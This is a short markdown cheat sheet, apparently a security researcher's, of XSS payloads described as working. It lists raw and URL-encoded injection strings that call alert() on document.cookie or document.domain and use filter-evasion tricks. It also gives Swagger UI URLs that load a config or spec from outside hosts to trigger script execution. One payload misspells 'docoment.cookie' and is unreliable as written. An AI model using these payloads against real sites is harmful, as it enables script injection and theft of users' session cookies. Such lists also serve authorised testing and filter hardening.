## Some working XSS payloads collected from recent pentests and bug bounty reports 

- javascript://%0dalert() 
- javascript:/**/%0aalert()
- javascript://%0aalert(1)
- Ah'-alert('k0imet')-'?=
- <Button href="javascript://%0aalert(document.domain)">XSS</Button>
- javascript:alert(document.domain)
- <img src=x onerror=alert(document.cookie)>
- "><script>alert(docoment.cookie)</script> encoded as %2522%253E%253Cscript%253Ealert(document.cookie)%253C/script%253E
- ');alert(document.domain);//
- <svg on onload=(alert)(document.domain)> encoded as %3Csvg+on+onload%3D%28alert%29%28document.domain%29%3E
- \" onerror = \"alert(123)\" \"
- abc`;return+false});});alert`xss`;</script> encoded as abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
- "<<scr\aaa/src=></script><script>alert("document.domain")</script>"
- </div><iframe%20src=javascript:alert('1337')>
- "><body%20onload%3Dalert(1)>
- +%22+onmouseover=%22alert(document.cookie)%22%3E%3C!--
- javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
- <svg/%20src=x%20onmouseover%3D"alert%26%230000000040%3B1)

## Swagger 
- http://example(.)com/swagger-ui/index.html?configUrl=https://jumpy-floor.surge(.)sh/test.json

- http://example(.)com/swagger-ui/index.html?url=https://jumpy-floor.surge(.)sh/test.yaml

- http://example(.)com/swagger-ui/index.html?configUrl=https://xss.smarpo(.)com/test.json&url=https://jumpy-floor.surge(.)sh/test.yaml
